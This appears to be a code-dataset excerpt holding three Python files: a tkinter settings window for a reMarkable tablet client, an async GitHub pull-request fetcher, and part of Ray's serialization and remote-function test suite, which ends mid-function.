source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
settings.py
|
from datetime import date
import time
import webbrowser
import tkinter as tk
import tkinter.ttk as ttk
from tkinter import messagebox
import threading
from pathlib import Path
import api.remarkable_client
from api.remarkable_client import RemarkableClient
import utils.config as cfg
from model.item_manager import ItemManager
class Settings(object):
def __init__(self, root, font_size):
self.rm_client=RemarkableClient()
self.item_manager = ItemManager()
root.grid_columnconfigure(4, minsize=180)
root.grid_rowconfigure(1, minsize=50)
root.grid_rowconfigure(2, minsize=30)
root.grid_rowconfigure(3, minsize=30)
root.grid_rowconfigure(4, minsize=30)
root.grid_rowconfigure(6, minsize=50)
root.grid_rowconfigure(7, minsize=30)
root.grid_rowconfigure(8, minsize=30)
root.grid_rowconfigure(9, minsize=50)
# gaps between columns
label = tk.Label(root, text=" ")
label.grid(row=1, column=1)
label = tk.Label(root, text=" ")
label.grid(row=1, column=3)
label = tk.Label(root, text=" ")
label.grid(row=1, column=5)
label = tk.Label(root, text="Authentication", font="Helvetica 14 bold")
label.grid(row=1, column=2, sticky="W")
self.onetime_code_link = "https://my.remarkable.com#desktop"
self.label_onetime_code = tk.Label(root, justify="left", anchor="w",
fg="blue", cursor="hand2", text="\nDownload one-time code from \n" + self.onetime_code_link)
self.label_onetime_code.grid(row=2, column=7, sticky="SW")
self.label_onetime_code.bind("<Button-1>", lambda e: webbrowser.open_new(self.onetime_code_link))
label = tk.Label(root, justify="left", anchor="w", text="Status: ")
label.grid(row=2, column=2, sticky="W")
self.label_auth_status = tk.Label(root, text="Unknown")
self.label_auth_status.grid(row=2, column=4, sticky="W")
label = tk.Label(root, justify="left", anchor="w", text="One-time code:")
label.grid(row=3, column=2, sticky="W")
self.entry_onetime_code_text = tk.StringVar()
self.entry_onetime_code = tk.Entry(root, textvariable=self.entry_onetime_code_text)
self.entry_onetime_code.grid(row=3, column=4, sticky="W")
self.btn_sign_in = tk.Button(root, text="Sign In", command=self.btn_sign_in_click, width=17)
self.btn_sign_in.grid(row=4, column=4, sticky="W")
label = tk.Label(root, text="General", font="Helvetica 14 bold")
label.grid(row=6, column=2, sticky="W")
label = tk.Label(root, text="Templates path:")
label.grid(row=7, column=2, sticky="W")
self.entry_templates_text = tk.StringVar()
self.entry_templates_text.set(cfg.get("general.templates", default=""))
self.entry_templates = tk.Entry(root, textvariable=self.entry_templates_text)
self.entry_templates.grid(row=7, column=4, sticky="W")
label = tk.Label(root, justify="left", anchor="w", text="A local folder that contains all template PNG files. \nYou can copy the template files from your tablet: \n'/usr/share/remarkable'")
label.grid(row=7, column=7, sticky="W")
label = tk.Label(root, text="Backup root path:")
label.grid(row=8, column=2, sticky="W")
self.backup_root_text = tk.StringVar()
backup_root_default = Path.joinpath(Path.home(), "Backup","Remarkable")
backup_root = cfg.get("general.backuproot", default=str(backup_root_default))
self.backup_root_text.set(backup_root)
self.entry_backup_root = tk.Entry(root, textvariable=self.backup_root_text)
self.entry_backup_root.grid(row=8, column=4, sticky="W")
label = tk.Label(root, justify="left", anchor="w", text="A local folder that will be used as the root folder for backups.")
label.grid(row=8, column=7, sticky="W")
self.btn_save = tk.Button(root, text="Save", command=self.btn_save_click, width=17)
self.btn_save.grid(row=9, column=4, sticky="W")
label = tk.Label(root, text="Backup", font="Helvetica 14 bold")
label.grid(row=10, column=2, sticky="W")
label = tk.Label(root, text="Backup path:")
label.grid(row=11, column=2, sticky="W")
self.backup_folder_text = tk.StringVar()
backup_folder = str(date.today().strftime("%Y-%m-%d"))
self.backup_folder_text.set(backup_folder)
self.entry_backup_folder = tk.Entry(root, textvariable=self.backup_folder_text)
self.entry_backup_folder.grid(row=11, column=4, sticky="W")
self.label_backup_progress = tk.Label(root)
self.label_backup_progress.grid(row=11, column=6)
label = tk.Label(root, justify="left", anchor="w", text="Copy currently downloaded and annotated PDF files \ninto the given directory. Note that those files can not \nbe restored on the tablet.")
label.grid(row=11, column=7, sticky="W")
self.btn_create_backup = tk.Button(root, text="Create backup", command=self.btn_create_backup, width=17)
self.btn_create_backup.grid(row=12, column=4, sticky="W")
# Subscribe to sign in event. Outer logic (i.e. main) can try to
# sign in automatically...
self.rm_client.listen_sign_in_event(self)
#
# EVENT HANDLER
#
def sign_in_event_handler(self, event, config):
self.btn_sign_in.config(state = "normal")
self.entry_onetime_code.config(state="normal")
self.btn_create_backup.config(state="disabled")
self.btn_save.config(state="disabled")
self.entry_backup_root.config(state="disabled")
self.entry_backup_folder.config(state="disabled")
self.entry_templates.config(state="disabled")
if event == api.remarkable_client.EVENT_SUCCESS:
self.btn_sign_in.config(state="disabled")
self.entry_onetime_code.config(state="disabled")
self.btn_create_backup.config(state="normal")
self.btn_save.config(state="normal")
self.entry_backup_root.config(state="normal")
self.entry_backup_folder.config(state="normal")
self.entry_templates.config(state="normal")
self.label_auth_status.config(text="Successfully signed in", fg="green")
elif event == api.remarkable_client.EVENT_USER_TOKEN_FAILED:
self.label_auth_status.config(text="Could not renew user token\n(please try again).", fg="red")
self.entry_onetime_code.config(state="disabled")
elif event == api.remarkable_client.EVENT_ONETIMECODE_NEEDED:
self.label_auth_status.config(text="Enter one-time code.", fg="red")
else:
self.label_auth_status.config(text="Could not sign in.", fg="red")
def btn_sign_in_click(self):
onetime_code = self.entry_onetime_code_text.get()
self.rm_client.sign_in(onetime_code)
def btn_save_click(self):
general = {
"templates": self.entry_templates_text.get(),
"backuproot": self.backup_root_text.get()
}
cfg.save({"general": general})
def btn_create_backup(self):
message = "If your explorer is not synchronized, some files are not included in the backup. Should we continue?"
result = messagebox.askquestion("Info", message, icon='warning')
if result != "yes":
return
backup_root = self.backup_root_text.get()
backup_folder = self.backup_folder_text.get()
backup_path = Path.joinpath(Path(backup_root), backup_folder)
self.label_backup_progress.config(text="Writing backup '%s'" % backup_path)
def run():
self.item_manager.create_backup(backup_path)
self.label_backup_progress.config(text="")
messagebox.showinfo("Info", "Successfully created backup '%s'" % backup_path)
threading.Thread(target=run).start()
|
providers.py
|
import json
import asyncio
import threading
from datetime import datetime
from urllib.parse import urlparse
from aiohttp import ClientSession
from backend import config, storage, const
class BaseJSONProvider:
def __init__(self, url, prov_id=None, headers=None):
self._url = urlparse(url)
self._id = prov_id if prov_id else self._url.netloc
self._headers = headers if headers else {'content-type': 'application/json'}
def __str__(self) -> str:
return self._id
def _wrap(self, data) -> dict:
"""wraps fetched data into storage-friendly dict"""
return dict(
id=self._id,
data=data,
timestamp=datetime.now().isoformat(),
)
async def _fetch_json(self, url, session) -> dict:
"""asynchronously fetches data by given url, then parses JSON response into dict"""
async with session.get(url, headers=self._headers) as response:
data = await response.read()
return json.loads(data)
def process(self, data) -> dict:
"""override this method if any processing of fetched data is required"""
return self._wrap(data)
async def collect(self) -> dict:
"""the entrypoint of the Provider class, does all work of data-gathering"""
async with ClientSession() as session:
t = asyncio.ensure_future(self._fetch_json(self._url.geturl(), session))
data = await asyncio.gather(t)
return self.process(data)
class GithubPullRequestsProvider(BaseJSONProvider):
def process(self, data):
"""override process method to extract only meaningful data
from Github's PR list response.
"""
processed = list()
for pull in data[0]:
processed.append(dict(
id=pull['number'],
author=pull['user']['login'],
created=pull['created_at'],
title=pull['title'],
))
return self._wrap(processed)
async def collect_updates(cfg: config.Config, db: storage.Storage):
# TODO: this should run forever
#
# TODO: wanna to look at previous update timestamp
# TODO: and decide starting related provider or not.
tasks = [p.collect() for p in init_providers(cfg)]
for fut in asyncio.as_completed(tasks):
result = await fut
pid = result['id']
print('saving "%s" provider data' % pid)
db.save_key(pid, result)
def init_providers(cfg: config.Config):
return [
GithubPullRequestsProvider(
url=cfg.github_repo_path,
prov_id=const.GITHUB_PULLS_PROVIDER_ID,
headers={'accept': 'application/vnd.github.mercy-preview+json'}
),
]
def threaded_main(loop: asyncio.AbstractEventLoop, cfg: config.Config, db: storage.Storage):
# bing given event loop to thread
asyncio.set_event_loop(loop)
# run async tasks bound to separate thread
loop.run_until_complete(collect_updates(cfg, db))
def start_background_updates(cfg: config.Config, db: storage.Storage) -> threading.Thread:
"""start background processing bound to another thread,
returns thread handle to be able to gracefully stop it
on application shutdown."""
# FIXME: need to find proper logging config and replace any `print`s
print("starting background processing thread ...")
loop = asyncio.get_event_loop()
t = threading.Thread(target=threaded_main, args=(loop, cfg, db))
t.start()
return t
|
test_basic.py
|
# coding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from concurrent.futures import ThreadPoolExecutor
import json
import logging
import os
import random
import re
import setproctitle
import shutil
import six
import socket
import string
import subprocess
import sys
import tempfile
import threading
import time
import numpy as np
import pickle
import pytest
import ray
import ray.tests.cluster_utils
import ray.tests.utils
from ray.utils import _random_string
logger = logging.getLogger(__name__)
@pytest.fixture
def ray_start():
# Start the Ray processes.
ray.init(num_cpus=1)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.fixture
def shutdown_only():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
def test_simple_serialization(ray_start):
primitive_objects = [
# Various primitive types.
0,
0.0,
0.9,
1 << 62,
1 << 999,
"a",
string.printable,
"\u262F",
u"hello world",
u"\xff\xfe\x9c\x001\x000\x00",
None,
True,
False,
[],
(),
{},
type,
int,
set(),
# Collections types.
collections.Counter([np.random.randint(0, 10) for _ in range(100)]),
collections.OrderedDict([("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: 0, [("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: [], [("hello", 1), ("world", 2)]),
collections.deque([1, 2, 3, "a", "b", "c", 3.5]),
# Numpy dtypes.
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
]
if sys.version_info < (3, 0):
primitive_objects.append(long(0)) # noqa: E501,F821
composite_objects = (
[[obj]
for obj in primitive_objects] + [(obj, )
for obj in primitive_objects] + [{
(): obj
} for obj in primitive_objects])
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in primitive_objects + composite_objects:
new_obj_1 = ray.get(f.remote(obj))
new_obj_2 = ray.get(ray.put(obj))
assert obj == new_obj_1
assert obj == new_obj_2
# TODO(rkn): The numpy dtypes currently come back as regular integers
# or floats.
if type(obj).__module__ != "numpy":
assert type(obj) == type(new_obj_1)
assert type(obj) == type(new_obj_2)
def test_complex_serialization(ray_start):
def assert_equal(obj1, obj2):
module_numpy = (type(obj1).__module__ == np.__name__
or type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ())
or (hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently
# np.testing.assert_equal fails because we do not properly
# handle different numerical types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) == set(
list(obj2.__dict__.keys()) + special_keys)), (
"Objects {} and {} are different.".format(obj1, obj2))
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples "
"with different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (ray.serialization.is_named_tuple(type(obj1))
or ray.serialization.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), (
"Objects {} and {} are named "
"tuples with different lengths.".format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, "Objects {} and {} are different.".format(
obj1, obj2)
if sys.version_info >= (3, 0):
long_extras = [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
long_extras = [
long(0), # noqa: E501,F821
np.array([
["hi", u"hi"],
[1.3, long(1)] # noqa: E501,F821
])
]
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 100, 1 << 999, [1 << 100, [1 << 100]], "a",
string.printable, "\u262F", u"hello world",
u"\xff\xfe\x9c\x001\x000\x00", None, True, False, [], (), {},
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
np.zeros([100, 100]),
np.random.normal(size=[100, 100]),
np.array(["hi", 3]),
np.array(["hi", 3], dtype=object)
] + long_extras
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{
"obj{}".format(i): np.random.normal(size=[100, 100])
for i in range(10)
},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
(
(((((((((), ), ), ), ), ), ), ), ), ),
{
"a": {
"b": {
"c": {
"d": {}
}
}
}
},
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(PRIMITIVE_OBJECTS + COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(), Bar(), Baz()]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = collections.namedtuple("Point", ["x", "y"])
NamedTupleExample = collections.namedtuple(
"Example", "field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [
Exception("Test object."),
CustomError(),
Point(11, y=22),
Foo(),
Bar(),
Baz(), # Qux(), SubQux(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
]
# Test dataclasses in Python 3.7.
if sys.version_info >= (3, 7):
from dataclasses import make_dataclass
DataClass0 = make_dataclass("DataClass0", [("number", int)])
CUSTOM_OBJECTS.append(DataClass0(number=3))
class CustomClass(object):
def __init__(self, value):
self.value = value
DataClass1 = make_dataclass("DataClass1", [("custom", CustomClass)])
class DataClass2(DataClass1):
@classmethod
def from_custom(cls, data):
custom = CustomClass(data)
return cls(custom)
def __reduce__(self):
return (self.from_custom, (self.custom.value, ))
CUSTOM_OBJECTS.append(DataClass2(custom=CustomClass(43)))
BASE_OBJECTS = PRIMITIVE_OBJECTS + COMPLEX_OBJECTS + CUSTOM_OBJECTS
LIST_OBJECTS = [[obj] for obj in BASE_OBJECTS]
TUPLE_OBJECTS = [(obj, ) for obj in BASE_OBJECTS]
# The check that type(obj).__module__ != "numpy" should be unnecessary, but
# otherwise this seems to fail on Mac OS X on Travis.
DICT_OBJECTS = ([{
obj: obj
} for obj in PRIMITIVE_OBJECTS if (
obj.__hash__ is not None and type(obj).__module__ != "numpy")] + [{
0: obj
} for obj in BASE_OBJECTS] + [{
Foo(123): Foo(456)
}])
RAY_TEST_OBJECTS = (
BASE_OBJECTS + LIST_OBJECTS + TUPLE_OBJECTS + DICT_OBJECTS)
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in RAY_TEST_OBJECTS:
assert_equal(obj, ray.get(f.remote(obj)))
assert_equal(obj, ray.get(ray.put(obj)))
def test_ray_recursive_objects(ray_start):
class ClassA(object):
pass
# Make a list that contains itself.
lst = []
lst.append(lst)
# Make an object that contains itself as a field.
a1 = ClassA()
a1.field = a1
# Make two objects that contain each other as fields.
a2 = ClassA()
a3 = ClassA()
a2.field = a3
a3.field = a2
# Make a dictionary that contains itself.
d1 = {}
d1["key"] = d1
# Create a list of recursive objects.
recursive_objects = [lst, a1, a2, a3, d1]
# Check that exceptions are thrown when we serialize the recursive
# objects.
for obj in recursive_objects:
with pytest.raises(Exception):
ray.put(obj)
def test_passing_arguments_by_value_out_of_the_box(ray_start):
@ray.remote
def f(x):
return x
# Test passing lambdas.
def temp():
return 1
assert ray.get(f.remote(temp))() == 1
assert ray.get(f.remote(lambda x: x + 1))(3) == 4
# Test sets.
assert ray.get(f.remote(set())) == set()
s = {1, (1, 2, "hi")}
assert ray.get(f.remote(s)) == s
# Test types.
assert ray.get(f.remote(int)) == int
assert ray.get(f.remote(float)) == float
assert ray.get(f.remote(str)) == str
class Foo(object):
def __init__(self):
pass
# Make sure that we can put and get a custom type. Note that the result
# won't be "equal" to Foo.
ray.get(ray.put(Foo))
def test_putting_object_that_closes_over_object_id(ray_start):
# This test is here to prevent a regression of
# https://github.com/ray-project/ray/issues/1317.
class Foo(object):
def __init__(self):
self.val = ray.put(0)
def method(self):
f
f = Foo()
ray.put(f)
def test_put_get(shutdown_only):
ray.init(num_cpus=0)
for i in range(100):
value_before = i * 10**6
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = i * 10**6 * 1.0
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = "h" * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = [1] * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
def test_custom_serializers(shutdown_only):
ray.init(num_cpus=1)
class Foo(object):
def __init__(self):
self.x = 3
def custom_serializer(obj):
return 3, "string1", type(obj).__name__
def custom_deserializer(serialized_obj):
return serialized_obj, "string2"
ray.register_custom_serializer(
Foo, serializer=custom_serializer, deserializer=custom_deserializer)
assert ray.get(ray.put(Foo())) == ((3, "string1", Foo.__name__), "string2")
class Bar(object):
def __init__(self):
self.x = 3
ray.register_custom_serializer(
Bar, serializer=custom_serializer, deserializer=custom_deserializer)
@ray.remote
def f():
return Bar()
assert ray.get(f.remote()) == ((3, "string1", Bar.__name__), "string2")
def test_serialization_final_fallback(ray_start):
pytest.importorskip("catboost")
# This test will only run when "catboost" is installed.
from catboost import CatBoostClassifier
model = CatBoostClassifier(
iterations=2,
depth=2,
learning_rate=1,
loss_function="Logloss",
logging_level="Verbose")
reconstructed_model = ray.get(ray.put(model))
assert set(model.get_params().items()) == set(
reconstructed_model.get_params().items())
def test_register_class(shutdown_only):
ray.init(num_cpus=2)
# Check that putting an object of a class that has not been registered
# throws an exception.
class TempClass(object):
pass
ray.get(ray.put(TempClass()))
# Test passing custom classes into remote functions from the driver.
@ray.remote
def f(x):
return x
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
foo = ray.get(f.remote(Foo(7)))
assert foo == Foo(7)
regex = re.compile(r"\d+\.\d*")
new_regex = ray.get(f.remote(regex))
# This seems to fail on the system Python 3 that comes with
# Ubuntu, so it is commented out for now:
# assert regex == new_regex
# Instead, we do this:
assert regex.pattern == new_regex.pattern
class TempClass1(object):
def __init__(self):
self.value = 1
# Test returning custom classes created on workers.
@ray.remote
def g():
class TempClass2(object):
def __init__(self):
self.value = 2
return TempClass1(), TempClass2()
object_1, object_2 = ray.get(g.remote())
assert object_1.value == 1
assert object_2.value == 2
# Test exporting custom class definitions from one worker to another
# when the worker is blocked in a get.
class NewTempClass(object):
def __init__(self, value):
self.value = value
@ray.remote
def h1(x):
return NewTempClass(x)
@ray.remote
def h2(x):
return ray.get(h1.remote(x))
assert ray.get(h2.remote(10)).value == 10
# Test registering multiple classes with the same name.
@ray.remote(num_return_vals=3)
def j():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = []
for _ in range(5):
results += j.remote()
for i in range(len(results) // 3):
c0, c1, c2 = ray.get(results[(3 * i):(3 * (i + 1))])
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
@ray.remote
def k():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = ray.get([k.remote() for _ in range(5)])
for c0, c1, c2 in results:
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
def test_keyword_args(shutdown_only):
@ray.remote
def keyword_fct1(a, b="hello"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct2(a="hello", b="world"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct3(a, b, c="hello", d="world"):
return "{} {} {} {}".format(a, b, c, d)
ray.init(num_cpus=1)
x = keyword_fct1.remote(1)
assert ray.get(x) == "1 hello"
x = keyword_fct1.remote(1, "hi")
assert ray.get(x) == "1 hi"
x = keyword_fct1.remote(1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct1.remote(a=1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct2.remote(a="w", b="hi")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(b="hi", a="w")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(a="w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote(b="hi")
assert ray.get(x) == "hello hi"
x = keyword_fct2.remote("w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote("w", "hi")
assert ray.get(x) == "w hi"
x = keyword_fct3.remote(0, 1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(a=0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, d="hi", c="w")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, c="w")
assert ray.get(x) == "0 1 w world"
x = keyword_fct3.remote(0, 1, d="hi")
assert ray.get(x) == "0 1 hello hi"
x = keyword_fct3.remote(0, 1)
assert ray.get(x) == "0 1 hello world"
x = keyword_fct3.remote(a=0, b=1)
assert ray.get(x) == "0 1 hello world"
# Check that we cannot pass invalid keyword arguments to functions.
@ray.remote
def f1():
return
@ray.remote
def f2(x, y=0, z=0):
return
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f1.remote(3)
with pytest.raises(Exception):
f1.remote(x=3)
with pytest.raises(Exception):
f2.remote(0, w=0)
with pytest.raises(Exception):
f2.remote(3, x=3)
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f2.remote(1, 2, 3, 4)
@ray.remote
def f3(x):
return x
assert ray.get(f3.remote(4)) == 4
def test_variable_number_of_args(shutdown_only):
@ray.remote
def varargs_fct1(*a):
return " ".join(map(str, a))
@ray.remote
def varargs_fct2(a, *b):
return " ".join(map(str, b))
try:
@ray.remote
def kwargs_throw_exception(**c):
return ()
kwargs_exception_thrown = False
except Exception:
kwargs_exception_thrown = True
ray.init(num_cpus=1)
x = varargs_fct1.remote(0, 1, 2)
assert ray.get(x) == "0 1 2"
x = varargs_fct2.remote(0, 1, 2)
assert ray.get(x) == "1 2"
assert kwargs_exception_thrown
@ray.remote
def f1(*args):
return args
@ray.remote
def f2(x, y, *args):
return x, y, args
assert ray.get(f1.remote()) == ()
assert ray.get(f1.remote(1)) == (1, )
assert ray.get(f1.remote(1, 2, 3)) == (1, 2, 3)
with pytest.raises(Exception):
f2.remote()
with pytest.raises(Exception):
f2.remote(1)
assert ray.get(f2.remote(1, 2)) == (1, 2, ())
assert ray.get(f2.remote(1, 2, 3)) == (1, 2, (3, ))
assert ray.get(f2.remote(1, 2, 3, 4)) == (1, 2, (3, 4))
def testNoArgs(self):
@ray.remote
def no_op():
pass
self.init_ray()
ray.get(no_op.remote())
def test_defining_remote_functions(shutdown_only):
ray.init(num_cpus=3)
# Test that we can define a remote function in the shell.
@ray.remote
def f(x):
return x + 1
assert ray.get(f.remote(0)) == 1
# Test that we can redefine the remote function.
@ray.remote
def f(x):
return x + 10
while True:
val = ray.get(f.remote(0))
assert val in [1, 10]
if val == 10:
break
else:
logger.info("Still using old definition of f, trying again.")
# Test that we can close over plain old data.
data = [
np.zeros([3, 5]), (1, 2, "a"), [0.0, 1.0, 1 << 62], 1 << 60, {
"a": np.zeros(3)
}
]
@ray.remote
def g():
return data
ray.get(g.remote())
# Test that we can close over modules.
@ray.remote
def h():
return np.zeros([3, 5])
assert np.alltrue(ray.get(h.remote()) == np.zeros([3, 5]))
@ray.remote
def j():
return time.time()
ray.get(j.remote())
# Test that we can define remote functions that call other remote
# functions.
@ray.remote
def k(x):
return x + 1
@ray.remote
def k2(x):
return ray.get(k.remote(x))
@ray.remote
def m(x):
return ray.get(k2.remote(x))
assert ray.get(k.remote(1)) == 2
assert ray.get(k2.remote(1)) == 2
assert ray.get(m.remote(1)) == 2
def test_submit_api(shutdown_only):
ray.init(num_cpus=1, num_gpus=1, resources={"Custom": 1})
@ray.remote
def f(n):
return list(range(n))
@ray.remote
def g():
return ray.get_gpu_ids()
assert f._remote([0], num_return_vals=0) is None
id1 = f._remote(args=[1], num_return_vals=1)
assert ray.get(id1) == [0]
id1, id2 = f._remote(args=[2], num_return_vals=2)
assert ray.get([id1, id2]) == [0, 1]
id1, id2, id3 = f._remote(args=[3], num_return_vals=3)
assert ray.get([id1, id2, id3]) == [0, 1, 2]
assert ray.get(
g._remote(
args=[], num_cpus=1, num_gpus=1,
resources={"Custom": 1})) == [0]
infeasible_id = g._remote(args=[], resources={"NonexistentCustom": 1})
ready_ids, remaining_ids = ray.wait([infeasible_id], timeout=0.05)
assert len(ready_ids) == 0
assert len(remaining_ids) == 1
@ray.remote
class Actor(object):
def __init__(self, x, y=0):
self.x = x
self.y = y
def method(self, a, b=0):
return self.x, self.y, a, b
def gpu_ids(self):
return ray.get_gpu_ids()
a = Actor._remote(
args=[0], kwargs={"y": 1}, num_gpus=1, resources={"Custom": 1})
id1, id2, id3, id4 = a.method._remote(
args=["test"], kwargs={"b": 2}, num_return_vals=4)
assert ray.get([id1, id2, id3, id4]) == [0, 1, "test", 2]
def test_get_multiple(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
assert ray.get(object_ids) == list(range(10))
# Get a random choice of object IDs with duplicates.
indices = list(np.random.choice(range(10), 5))
indices += indices
results = ray.get([object_ids[i] for i in indices])
assert results == indices
def test_get_multiple_experimental(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
object_ids_tuple = tuple(object_ids)
assert ray.experimental.get(object_ids_tuple) == list(range(10))
object_ids_nparray = np.array(object_ids)
assert ray.experimental.get(object_ids_nparray) == list(range(10))
def test_get_dict(shutdown_only):
ray.init(num_cpus=1)
d = {str(i): ray.put(i) for i in range(5)}
for i in range(5, 10):
d[str(i)] = i
result = ray.experimental.get(d)
expected = {str(i): i for i in range(10)}
assert result == expected
def test_wait(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
ready_ids, remaining_ids = ray.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
ready_ids, remaining_ids = ray.wait(objectids, num_returns=4)
assert set(ready_ids) == set(objectids)
assert remaining_ids == []
objectids = [f.remote(0.5), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=1.75, num_returns=4)
assert time.time() - start_time < 2
assert len(ready_ids) == 3
assert len(remaining_ids) == 1
ray.wait(objectids)
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=5.0)
assert time.time() - start_time < 5
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
# Verify that calling wait with duplicate object IDs throws an
# exception.
x = ray.put(1)
with pytest.raises(Exception):
ray.wait([x, x])
# Make sure it is possible to call wait with an empty list.
ready_ids, remaining_ids = ray.wait([])
assert ready_ids == []
assert remaining_ids == []
# Test semantics of num_returns with no timeout.
oids = [ray.put(i) for i in range(10)]
(found, rest) = ray.wait(oids, num_returns=2)
assert len(found) == 2
assert len(rest) == 8
# Verify that incorrect usage raises a TypeError.
x = ray.put(1)
with pytest.raises(TypeError):
ray.wait(x)
with pytest.raises(TypeError):
ray.wait(1)
with pytest.raises(TypeError):
ray.wait([1])
def test_wait_iterables(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
objectids = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ID.
